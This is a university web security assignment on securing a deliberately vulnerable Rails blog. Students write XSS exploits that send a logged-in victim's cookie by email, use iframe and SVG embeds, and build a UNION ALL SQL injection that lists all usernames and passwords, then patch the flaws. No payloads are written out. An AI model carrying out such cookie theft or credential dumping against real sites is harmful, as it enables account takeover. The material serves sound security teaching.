CS142: Web Programming and Security

Project 7: Rails Security

Due: Wednesday, February 25, 2009

After spending your youth pillaging and plundering the denizens of the web using your mad skillz, the time has come for you to grow up. It is now time for you to retire from your wild exploits, and redeem yourself in the eyes of the world. You decide to put your skills (yes skills, not skillz) to good use and become an up and coming web security consultant.

Light has offered you a chance to take a step towards redemption by securing his friend's hand rolled blogging software. Help his friend out: find and fix XSS and SQL Injection vulnerabilities in Simple Blog.

Project Setup

  1. Download the project zip file.
  2. Unzip the file into your desired directory. This will create two directories: proj7 and proj7fix. For Windows, make sure you unzip into InstantRails' rails_apps directory.
  3. In the proj7 directory, type the following:
    rake db:create
    rake db:migrate
  4. Start the application using the following command:
    ruby script/server
    
  5. In your browser, go to http://localhost:3000/. You should see the Simple Blog front page.
  6. In your proj7fix directory, start the application on port 3001 using the following command:
    ruby script/server -p 3001
    
  7. In your browser, go to http://localhost:3001/.
  8. The login is light / password.

proj7 and proj7fix have exactly the same code right now, and they share the same database. You should use the proj7 copy to test that your exploits work. You should put your fixes to the vulnerabilities listed below in proj7fix.

Part 1: Simple XSS

  • Find the simple XSS vulnerability. This XSS vulnerability is "simple" because the vulnerable input field has no input filtering whatsoever.
  • Use the XSS vulnerability to e-mail yourself the victim's cookie when the victim is logged in
  • Link to the email script you should use is included on the Simple Blog home page.
  • Put the text you use to exploit the vulnerable field in 1.txt.
  • Fix the vulnerability in Simple Blog in your proj7fix copy.

Part 2: More Sophisticated XSS

  • Find the harder-to-exploit XSS vulnerability. This XSS vulnerability is harder to exploit because the input field has some input filtering.
  • Exploit the XSS vulnerability using an iframe and then using an embedded image/svg+xml.
    • For the iframe exploit, alert the cookie.
    • For embedded image/svg+xml exploit, simply alert the text "cs142".
    • Read "SVG - XML format for graphics" for more information about SVG documents.
  • Put the text you submit into the vulnerable field in 2iframe.txt and 2embed.txt.
  • Why can't you alert the cookie easily when you exploit the XSS using embed image/svg+xml? Put your answer in 2q.txt.
  • Fix the vulnerabilities by removing customizations in config/environment.rb in your proj7fix copy.

Part 3: SQL Injection

  • Find the SQL Injection vulnerability. This SQL injection vulnerability can be exploited by crafting the right URL.
  • Use UNION ALL to list all the usernames and passwords registered in Simple Blog.
  • Even though Firefox will let you get away without URL encoding the value of the GET parameter, you should do so. Otherwise your URL is not a valid URL by web standard. Put the URL-encoded exploit in 3.txt.
  • Fix the SQL Injection vulnerability in Simple Blog.

Additional Requirements, Hints, etc.

  • You must work alone for this project. You may discuss general approaches with other people, and you may ask for help if you get stuck, but you must write your own exploits and fixes.
  • Read the following page about handling SQL injection and XSS in Rails. There is only one slight mistake in the page: the SQL injection vulnerability noted on the page cannot be used to drop tables. Rails does not let you submit more than one SQL query using any method of ActiveRecords.
  • You can edit and remove posts in Simple Blog directly through the database.
  • If you cannot find the vulnerabilities mentioned above, you should pay particular attention to the input filtering, or lack thereof, in our code.
  • Firefox trims trailing space off your URL, unless you encode the trailing space using %20.
  • All the fixes are supposed to be very simple. The point is to show you a few ways you might trip up when coding in Rails. If you have a hard time writing fixes, please let us know. You are likely going down the wrong path.

Challenge Problem 1: More Vulnerabilities

We may well have overlooked other web application vulnerabilities, such as XSS, CSRF, or SQL Injection. Please report them to us. We will acknowledge your contribution here and in all future distribution of the project.

Deliverables

Use the standard class submission mechanism to submit a README file and your answers in 1.txt, 2iframe.txt, 2embed.txt, 2q.txt, and 3.txt and your entire proj7fix directory and its descendants, with all the above vulnerabilities patched.

Please indicate in the README file whether you developed on Windows or a Macintosh. We may need this information in order to test your solution. Please also include how much time you spent on each part and how hard it was for you (too easy, easy, good, hard, too hard). Feel free to add any feedback you have on the assignment, and any other things you need to tell us about your assignment that will help us improve it.

Section Materials

Here are the section slides (PPT, PDF).